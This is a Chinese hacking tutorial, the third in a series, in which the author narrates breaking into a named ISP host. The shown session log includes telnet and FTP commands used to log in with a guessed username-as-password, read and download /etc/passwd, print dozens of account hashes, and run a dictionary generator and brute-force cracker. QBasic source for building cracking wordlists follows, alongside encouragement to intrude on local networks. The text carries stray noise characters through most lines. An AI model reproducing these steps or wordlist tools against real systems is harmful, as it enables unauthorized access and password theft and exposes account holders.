如何破解系統(tǒng)（3）

這不是一個教學文件, 只是告訴你該如何破解系統(tǒng),好讓你能夠將自己的系統(tǒng)作安全的保護, 如果你能夠將這份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人 Crack Password若有人因此文件導致惡意入侵別人的電腦或網路, 本人概不負責 !!

- O4 `; C4 u. ^7 m/ d7 h前幾次說到了 Net Coffee 店, 還好他們沒有提供客戶撥接上線的功能,不然密碼或是帳號被人盜用的客戶不就糗大了! 但是 CoolFire 在這兩周的探險中, 為了找一個酷似網路咖啡站臺的
W3 密碼,誤入一個號稱第一個提供網路撥接的 ISP, 且在 CoolFire 順利的抓回 /etc/passwd
! B% G" @; G! Z$ O9 ?: d之後, 使用了自己寫的 PaSs2DiC + CJack 來解出密碼, 沒想到不用 1 分鐘, 就找出了 9 組 ID 與Password 相同的密碼,勿怪我沒有在這里提醒大家, 還好我沒有找到 root password, 不然可能該系統(tǒng)就此停擺,不可再見天日也! (當然我不可能這麼作啦!).
1 w2 a( r) U' u2 [- }7 Q
看看最近興起的網路咖啡及各大網站的系統(tǒng)安全設施, 再加上 CoolFire最近開會的時候遇到的情況, 不難發(fā)現(xiàn)我們的國家正往高科技的領域快步邁進, 但是這些系統(tǒng)的安全性若不加強,可能到時候人家只要一臺電腦再加上一臺數(shù)據(jù)機就可以讓整個國家的金融及工商業(yè)崩潰!
大家要小心呀 !
1 _+ m6 t6 d0 ~* }* jISP 是一般 User 撥接的源頭, 技術上理應比較強, 但還是輕易讓人入侵, 且又沒有教導User 正確的網路使用觀念 (Password 的設定及 proxy 的使用等),實在不敢想像這樣的網路發(fā)展到幾年後會是甚麼樣子 ??

) V& A3 ]5 _$ }: x% ]/ g這一次的說明還是沒有談到新的技巧, 在 James將首頁更新後各位應該已經可以從中學到許多東西了, 如果想要學習入侵, 就一定要知道最新的資訊 (入侵本國的網路則不用,反正沒人重視網路安全..... 真失望), 在別人還沒將 Bug 修正之前就搶先一步拿到 /etc/passwd,所以訂閱一些網路安全的 Mail List 是必要的, 多看一些網安有關的 News Group 也是必要的 (不僅 Hacker如此, ISP 更要多注意這些資訊!). 日後有空再整里一些 Mail List 給大家 !!
5 H- T' Y! H; d6 h
本次主題: 說明如何連接該 ISP 并且對其 /etc/passwd 解碼連接位址: www.coffee.com.tw (203.66.169.11)特別說明: 由於本次主題說明重點使用真實的位址及名稱, 所以 CoolFire 已經 Mail給該網頁之維護人員更改密碼, 但該網頁之 ISP 仍為新手之練習好題材! CoolFire
Mail 給該網頁維護人員之信件內容如下, 如果他還不盡快改掉, 我也沒辦法了!

; e9 R4 D! l0 LMail sent to dhacme@tp.globalnet.com.tw:
% }& b# D/ ?6 h" aSubject: 請速更動網頁密碼
From: CoolFire <coolfires@hotmail.com>
) ^7 Z( E$ ?& K9 j: |: k
, v2 z5 N+ t) f* M$ R你的網頁作得不錯, 但是因為你所設定的密碼太容易為駭客所? 入侵, 請於見到此信後速速更改你的網頁進入密碼, 否則下次若網頁遭到篡改, 本人概不負責!!

**** 課程開始 ****

- K' o5 e( u" x  h2 R6 {' x! `請注意: 由於本次所作的課程內容以實作為主, 除了本人 IP 有所更改,一切都使用本人所用之
" Q% d3 h$ g0 l8 U) CTelnet 軟體 Log 檔收錄, 故若道德感不佳者請勿閱讀以下之詳細破解內容,否則本人概不負責!

(連線到某一主機之後.... 此處的 ms.hinet.net.tw 是假的 Domain name)
ms.hinet.net.tw> telnet www.coffee.com.tw
. H8 i# M! ]+ N4 l0 T" ?Trying 203.66.169.11...
Connected to www.coffee.com.tw.
Escape character is '^]'.
7 \8 d! u& W! R2 l" d# B; FPassword: (隨便按一下 Enter)
, e" O  R5 k4 _Login incorrect
3 m8 B7 {6 _- R0 _+ J  a+ |
: K1 l) |& U- n' I( u7 |% Hwww login: coffee (以 Hacker 的敏銳判斷 username=coffee password=coffee)
+ C- C3 l4 q$ Q2 t' JPassword:
. z' l# |' X3 O8 \+ P+ h0 A) rLast login: Thu Jan 9 10:41:52 from ms.hinet.net.tw

$ G8 |) i8 p3 K+ q歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽, 大家自己去看吧!
# |3 b0 J# G  z=================================================================

4 W3 X# W  }% K* b/ B/ {6 q  E(直接進入核心部份)
$ n* I) J7 q+ J6 Vwww:~$ cd /etc
www:/etc$ ls
4 B; p$ A' m6 d( K9 m4 {: cDIR_COLORS hosts.equiv printcap
# \% `8 y8 n  D: r) T0 p) u0 ~HOSTNAME hosts.lpd profile
NETWORKING inet@ protocols
: s; J1 E4 b6 M2 R  ^NNTP_INEWS_DOMAIN inetd.conf psdevtab
X11@ inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
* D' T  C. l3 K  G/ v- }) P( Obootptab ioctl.save rpc
csh.cshrc issue securetty
csh.login issue.net securetty.old
default/ klogd.pid sendmail.cf
+ J+ s" F8 A5 H! W; a3 {  b6 bdiphosts ld.so.cache sendmail.st
exports ld.so.conf services
. }$ z# k1 ^7 g* U" Wfastboot lilo/ shells
fdprm lilo.conf shutdownpid
fs/ localtime skel/
fstab magic slip.hosts
6 y& D7 D- ^' V% f/ x2 G* ?ftp.banner mail.rc slip.login
9 Q8 n# q. @# d/ i* Fftp.deny motd snooptab
$ P: Y7 k. v; S0 P4 Rftpaccess motd.bak sudoers
ftpconversions msgs/ syslog.conf
) m) P/ u0 I5 }# E0 l, lftpgroups mtab syslog.pid
% B7 d* ~; ~  _+ S  dftpusers mtools termcap
! p9 Z$ |! t* I% d( T# a9 sgateways named.boot ttys
/ L5 z: E4 O9 y* wgettydefs networks utmp@
group nntpserver vga/
host.conf passwd wtmp@
; K9 J- S/ T: k% D& Ihosts passwd.OLD yp.conf.example
+ Y0 ?1 O6 s$ C' r# f0 }hosts.allow passwd.old
" a5 S7 w, K4 M( p* v: khosts.deny ppp/
8 d; X6 u( w$ h, Z) L( C) d
(看看我們的目標長得如何???)
$ `! ?/ P7 ?$ v! l7 F/ }8 jwww:/etc$ cat passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
7 `9 j0 o# i$ J3 ]8 E: T0 Usync:*:5:0:sync:/sbin:/bin/sync
/ b/ ]7 s2 f3 q$ `- k8 |# dshutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
% a+ C2 y+ K1 v2 u) A4 ]( rhalt:*:7:0:halt:/sbin:/sbin/halt
6 s- C5 f5 g5 c6 d8 s: Tmail:*:8:12:mail:/var/spool/mail:
$ ^8 f, H6 r% ]0 J& _) \news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
* {0 J& J+ k3 ?4 Qman:*:13:15:man:/usr/man:
+ ^) X/ l" M# Dpostmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
! |( {% T; N8 d$ L$ W- oshan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
4 s& }* V% k% A& jtest:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
, ]2 ~: q# T, |! H; ?& o, akanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
5 A0 ^' Q0 V/ ]bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
* Q3 O/ s7 c; acarven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
+ X/ ^8 Z/ G4 m  G: rprime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
8 g/ |; B) ]2 S( A  Z1 T7 F+ ^sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
, {2 H$ m1 i0 G1 n9 Lorder:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash
$ r0 X  i2 i$ M* x; Ocorey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
  K+ Z! m' q: O. P/ o( L) nrichard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
& a5 i( T$ [. r) n$ p. C! C- U) {' dlilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
. `0 _3 t# `) E" m4 Bsupport:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
! i0 ?/ I* d9 b; O4 Z6 Cbear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
lance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
1 w- F) Z: Y0 N, O, s' I" A0 L9 w  ]taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash
) `1 l& F6 a3 b3 c1 aliheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
/ r" N& F7 D+ \' R  f( {, qsales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
+ q; h  b/ r1 L  d% erecycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
: l9 z5 ?4 b1 S* w/ F  ~8 @recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
2 I$ T# q1 X, D. ]# I, `1 f- c3 @* Grecycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
! X7 Z$ K8 A% k( f& ~goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
3 Q/ ]: @2 y+ ]5 S: A7 T0 O' D/ Tjdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
# w* G  S3 t3 Q7 R$ g# Ftkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
: d3 l% Z5 _# X) R( As6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
8 Y" D% T6 Q. ]( o3 [7 Alsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
lilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash
nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
& }7 X* D4 H) q4 Ejordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
# A$ [2 q4 V+ ptoonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash
basic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash
wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash
kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash
; D1 G5 R, v8 O3 |4 @shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash
fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash

- E5 [! G) c  S0 |; I% D8 [. Y9 ~(CoolFire 注: 因為使用 PaSs2DiC 很容易找出 ID 與 Password 相同的. 故除了 Coffee外, 其它我找到密碼的 EnCode Password 部份皆改過..... 除非你一個一個試啦~~~ 我沒說喔!)

www:/etc$ exit
/ H& h# k) {% z7 v8 {logout
Connection closed by foreign host.
, A/ m: ?3 B# ]' p2 _( _
# Q6 t/ l) {4 S2 _4 ~. U(可以走了 !! 改用 FTP 將 /etc/passwd 給抓回來吧!)

2 |" t( e) v7 K: @- x0 H3 d7 nms.hinet.net.tw> ftp www.coffee.com.tw
7 G9 S  C( f  ~$ c/ OConnected to www.coffee.com.tw.
  j" D) ]+ T! u2 n; g2 G3 p220-
220- 歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽, 大家自己去看吧!
, K  \7 ^6 w9 w0 k& N- [4 ]220-
220-
) n2 b7 Z# _7 X4 g0 y# d" v, G220- There are 0 users in FTP Server now.
220- 目前已有 0 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- service@xx.xxxxxxx.xxx.xx.
220-
220-
% l; y& ]0 _  X" C' s0 q- A0 l  S220-
* d& m5 F& m/ F9 J( }! y3 g220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
* d3 q, b7 I* W" I& h
(還是使用剛剛的帳號進入)
, q0 X- a0 l% @+ e
Name (www.coffee.com.tw:YourName): coffee
" y$ [) t6 v$ e+ f" B! z331 Password required for coffee.
Password:
) _; q/ ~. P$ q7 p230 User coffee logged in.
Remote system type is UNIX.
' Q+ @+ x, N1 k! lUsing binary mode to transfer files.

" j' C$ w3 ]0 a1 K(直接到達檔案放置地點)
6 k. l. z# K/ ?7 _% i
ftp> cd /etc
$ q! m- B% c7 P- ]$ I& _4 v" [( q6 P! n250 CWD command successful.
ftp> ls
0 E  A) f- ^! E" U200 PORT command successful.
/ C% H) i/ [+ P0 p150 Opening ASCII mode data connection for file list.
ttys
fdprm
group
4 t2 ~2 |5 k3 V+ E6 c  U1 I6 h4 L$ rissue
motd
mtools
: L* P* a% F. T1 w1 Z1 J& Z/ bprofile
securetty
shells
5 e6 e. @& s, e3 }termcap
skel
5 i( J- U9 |. p- ^csh.cshrc
csh.login
8 s' |) \# [# P$ H% f( p4 ]lilo
inet
" k1 q+ o9 U8 p; l2 B8 R; u( gdefault
$ g: _* {* k! K/ K0 D' _( xservices
8 T& j. |* C' h3 YHOSTNAME
) [- t/ J6 S1 k# E' Z, d9 WDIR_COLORS
passwd
passwd.OLD
wtmp
utmp
gettydefs
inittab.gettyps.sample
ld.so.conf
, @; u+ b, x4 k0 Rld.so.cache
; I) _) g# I- B5 x# y2 yat.deny
7 |  t# L$ F! O' m; J$ \. Dfs
' F4 q1 ]5 ?6 W7 _6 Wmagic
rc.d
! G5 ~! u1 t2 Ysyslog.conf
- R- `  S# {8 {; b) lprintcap
inittab
sudoers
8 @! y6 e; k: w0 A: e/ }, x, @& Vvga
diphosts
mail.rc
ppp
NNTP_INEWS_DOMAIN
sendmail.st
NETWORKING
: G- I* K/ O0 O8 G  b0 I% H( m- wgateways
: h: }, l9 a. J; `' Q( O' ibootptab
/ j: |! [2 g) G, i% C% ]* Nexports
7 Z3 E0 t  I$ y' cftpusers
. O/ @  x% {$ O% M; O# Zhost.conf
hosts
2 i! n5 |4 U4 ghosts.allow
hosts.deny
+ X; X$ L. c  _8 k" R% z- dhosts.equiv
( e6 _6 F/ e5 j" w% U" C4 ^inetd.conf
named.boot
4 `& }# @6 {- r. znetworks
' ~, F: Q, }# A7 D$ h! |1 R( Dnntpserver
protocols
resolv.conf
& x* d4 I7 m! A2 v  _! Krpc
& ], U& q6 w3 E9 R- s# B, @+ Sftpaccess
0 ]+ u: z* {' ?+ a# ?7 W" a9 }* ^hosts.lpd
ftpconversions
snooptab
msgs
ftpgroups
3 \: t0 Q# i! n" v2 r& g7 oslip.login
) h7 L5 {3 L, }5 [6 U4 K: t) Q; y9 ^slip.hosts
, `- F& ^3 x7 a+ |yp.conf.example
2 f6 z1 I" l' Y5 [X11
lilo.conf
- ], e  |4 h+ }- V& Q- Qsendmail.cf
fstab
' U- O: C+ h3 f, z2 Hfastboot
# j# u/ N0 h+ M7 X6 Xmtab
6 l* }8 j/ s) usyslog.pid
9 s7 j, O1 M$ x4 i$ V8 O2 gklogd.pid
( P, d  {! J* j) \shutdownpid
localtime
passwd.old
ioctl.save
psdevtab
& T* H! O& e( R% ~ftp.banner
ftp.deny
4 t: B3 R; {1 I; E6 c! missue.net
6 n* t/ G+ s1 [4 u1 {motd.bak
securetty.old
226 Transfer complete.
& L0 M+ }# O! D
(取回該檔案)

  l0 d  b8 z/ a# X; {) x, |ftp> get passwd
% h& b+ Z5 N: i! L+ z4 {; e1 b/ \200 PORT command successful.
150 Opening BINARY mode data connection for passwd (4081 bytes).
226 Transfer complete.
5 a. f3 B5 p$ }9 Y2 L$ k4081 bytes received in 2.5 seconds (1.6 Kbytes/s)

(盡速離開)

6 n, Q0 A$ a: V8 ~" \5 Z8 xftp> bye
221 Goodbye.

- O2 W5 Q* i" L2 x1 T* Z好了! 有了 /etc/passwd 之後一切都好辦了, 趕緊將你的寶貝收藏 PaSs2DiC 拿出來吧
6 c8 ~1 m8 h& V4 X9 H$ ]* g!!快點跑一下, 讓它自動產生字典檔案:

C:\hack>pass2dic
8 n0 ]! @3 ]1 F/ dPaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.
' v0 ]% Y( d7 _3 G" U* [' {
This tool will:
- w" V2 ^) u& X! C8 B3 J8 r
[1] Load PASSWD file and convert it to only username text file
[2] Write the file to a dictionary file you choise for target

Your Source PASSWD File Name: passwd
Your Target Dictionary Name: dic.cfe

PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
FETAG Software Development Co: http://www.showtower.com.tw/~fetag

C:\hack>

(這樣就好了 ! 自動產生的檔案會放在 dic.cfe 這個檔案中, 咱們跑一下 Brute Force看看!)
' D, V! c* @. O/ k& ?3 b. J

) S$ B, {5 d1 M/ ~1 T& R6 mC:\hack>fbrute passwd @dic.cfe
" }% s' e$ N$ v+ b2 F# M' i- \1 K
BRUTE!, Unix Brute Force Hacking Routine. v2.0
Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.
8 I4 Z' m+ e+ S9 o闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡
: s& J+ [) d' ?
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　
Attempts/Hits: 5184/9
4 f! I9 f& x: H. ^# P# k1 L　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　

& W  K0 {# G- F, cTaking list input from dic.cfe
Beginning search of passwd for password: xxx

+ |" i0 ]0 c: c4 b* nMatch for password xxxxxx found! Username: xxxxxx
1 ?% G* \# j, vMatch for password xxxxx found! Username: xxxxx
2 @1 o$ C* |+ p: ^2 LMatch for password xxx found! Username: xxx
Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxxx found! Username: xxxxxx
Match for password coffee found! Username: coffee
$ U2 h$ _! e; V6 {; `8 d1 g2 bMatch for password xxxxxxx found! Username: xxxxxxx
Match for password xxx found! Username: xxx
Match for password xxxx found! Username: xxxx
; E+ m) q9 Q* {' f& F" I% p
: U) }# f) \8 _4 M- i) g# m" hDone.

C:\hack>

看! 除了 coffee 外還是有許多人使用與 ID 相同的字作為密碼, 實在是....@#$%^...&*因某些關系所以其它部份要被 "馬賽克" 起來, 請各位讀者見量!

**** 再談密碼 ****
' [; F& M  [4 F- y- d5 H7 r8 y; C
看了以上的破解示范, 就可以了解到許多人還是對於 "密碼" 這東西不是很有 "密碼"的觀念, 人就是那麼的懶, 隨便設定一個好記的, 但是這種密碼確是最不安全的, 上次我們談到如何用
QBasic 來設計一個自動產生密碼的小程式, 相信對許多人有很大的幫助,底下我們再來淺顯的介紹一下字母密碼的產生方法, 相信對於你在 Hack 某站會有更大的幫助.
# t& ]+ C6 {- j# W
事情的開始是有一位網友 mail 給我, 問我字典檔要如何寫程式來 "自動擴大",而讓我有了寫這一段的想法, 現(xiàn)在我就針對這位網友的問題作一個更詳細的說明 (因已簡短回信答覆),并且寫出來讓大家了解一下, 當然我們的示范還是使用 QBasic, 因為這是最容易找到的程式了,而且語法大家也可能會比較熟悉一點, 如果我使用 VB 或 C 來寫, 可能有些人只會拿去用,而不會去修改或者寫個好一點的出來!

. m# H9 f- f* J" E- ?! j先說明一下原理好了: 我們所要作的程式是一個自動產生字典檔的程式,所以我們要了解字的字母排列到底有哪些方法可循?? 我們先舉幾個簡單的單字出來比較看看:
- _  O: i* M7 O, I+ z5 k4 F
[1] apple [2] guest [3] james [4] superman [5] password
: R+ W- y& x* H. Z, Z, N: b! w+ L
3 j1 x0 K. O9 BOK! 來看看! 如果你有一點英文的概念的話應該會知道母音及子音吧 !
, V* b8 y! a" |/ v* F  i我們首先這樣說明: 母音在英文
上有 : A E I O U 這五個, 所有的英文單字都會有這些母音(有些沒有的可能是專有名詞或縮寫), 也有可能是雙母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等,
' x% ^/ @8 C5 U4 J) K再來就是比較每個字的開頭, 有可能是母音,也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student是兩個子音再接一個母音字母, 所以接下來依照常用字將這些子音找出來, 我想了一下大概有: br, bl, cl, dg,dr, fl, gr, kn, ph, st, sp, wh .... 等幾種(其它請自行統(tǒng)計), 然後是結尾部份, 通常結尾部分有下列幾種: e;est; ord; ard; ls; es; s...等好多好多, 我們稍為思考一下就知道要如何寫出這樣的程式出來了 !!
我大略寫一個簡單的, 其它大家自行發(fā)揮, 如果有人學語言學的, 請幫忙弄一份常用組合表出來, 可能會更有幫助吧 !!
; z1 S! V% @9 [3 ]
底下就是該程式片段, 執(zhí)行後會產生 MyDic.Txt 檔, 大小為: 22,096 Bytes 共有 3120個字的字典!!
. E+ K' p5 P. n& q5 [# g
; K6 J2 D1 k/ `! V2 F' @' X--------------- MakeDic.BAS Start Here
-------------------------------------------------------------------------------
--------
DIM FirstWord$(20)
0 h6 m1 P+ }' `% d& k; B* sDIM MotherWord$(13)
DIM LastWord$(12)

DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s",
9 T! t3 @# L( b* b* _"t", "p", "k" , "f", "m", "n", "b","k"
: ?9 O% o6 ]3 I! l8 A& `DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"
DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"

FOR I = 1 TO 20
READ FirstWord$(I)
PRINT FirstWord$(I)
NEXT I
$ e% m1 M4 v2 @& }
5 z1 `  a9 D3 \* ^FOR I = 1 TO 13
. a/ g. f# J$ ^7 \READ MotherWord$(I)
NEXT I

6 d: [- S4 ?2 h1 ~FOR I = 1 TO 12
! L( ^2 I& H* T/ ?READ LastWord$(I)
NEXT I

5 @" u- x+ ]2 j2 W. QOPEN "MyDic.txt" FOR OUTPUT AS #1
. n$ Z. Y* O7 _
: j" [4 }/ @+ ^FOR I = 1 TO 20
FOR J = 1 TO 13
5 a$ Z4 j4 K* M' M  CFOR K = 1 TO 12
PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)
NEXT K
9 b* x- v6 |6 u4 t6 V, P' ~/ FNEXT J
NEXT I

CLOSE : END
# C+ a( P7 R5 n; L6 o--------------- Cut Here, End of MakeDic.BAS
-------------------------------------------------------------------------------
, s" \$ V0 H# l+ `, Z% _' ?6 @1 s-

當然這只是小部份的組合, 相信你可以作出一個更大的字典檔出來, 如:
子音+母音+子音+母音+子音, 作出來的字典檔會很嚇人喔 !! 這一個部份就講到這里了 ! 如果你有很棒的字典產生程式,寫好了請 Mail 一份給我喔 !! 如果可以的話請說明是否可以公布在我的 W3 上讓其它人下載 !!還是你只是要給我 ?!

8 `& l$ P' E. k" `' Y希望每次講到密碼的問題後, 大家可以將這些密碼的產生方法與自己的密碼對照看看,如果有相同的請趕緊將自己的密碼換掉, 我講得口沫橫飛, 都沒有人要聽嗎 ??? 咖啡業(yè)者...... ISP
' i3 x+ e0 _0 ?# H4 i們.... 教教你們的使用者吧..... 唉~~~~


0 b& X: U6 j7 w- M# f**** 後語 ****

我們的首頁感謝大家的支持, 現(xiàn)在人數(shù)已經到達 2,000 了, 這是一個地下站(未對外正式公布) 很棒的一個數(shù)字, 在與其它工作室人員研究之後, 暫時不對外公布站址, 如果你是 "誤闖"到本站來的! 我們歡迎你的加入, 但目前尚不考慮對外公布站址, 請您在告訴你的朋友有這麼一個站存在的時候,請他不要隨便告訴別人 (請只告訴你信賴的朋友; 或對電腦有一份特別狂熱的人, 我們都歡迎他們的加入),我們目前所采用的方式將是開放式的! 對首頁部份暫時不以密碼方式處理.
6 [3 F& }) p3 k1 v$ V( i
** 不要 Crack 這個首頁的 ISP!!!! 否則 FETAG Sofeware's Hacking Page將會完全關閉, 再也不尋找其它的地方來放置, 希望給你的是使用電腦的 "知識", 不要利用它來奪取任何的 "權利",本首頁著重的是教育, 而不是一　的教導攻擊的方法, 希望大家對於政府機關 (org.tw) 或教育機構 (edu.tw)不要作任何的破壞!!還有我的 ISP......:D
, _8 y: W$ @, [" l/ m( u
: K, j; m. g+ t, v, c5 ~------
哇! 一份案子搞了好久, 都沒時間維護網頁了, 所以特別將維護的工作還給了 James,希望大家多多支持我們的園地, 我案子搞完後再跟大家談談我最近的實戰(zhàn)故事! 雖然沒時間寫網頁,但是還是會寫一些文件給大家作為參考 !!

, V, o+ r1 C" k9 H+ D' A------
. s/ ~, T& [' V" _再次重申, Crack 別人站臺之後不要破壞別人站臺中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機.... (高-Net 還是除外)... 請勿將這類技術使用於破壞上 (又...如果第三次世界大戰(zhàn)開打, 你可以任意破壞敵國的電腦網路... 我全力支持),最嚴重的情況(如果你真的很討厭該主機的話)... 就將它 Shut Down.... 好了! 別太暴力了!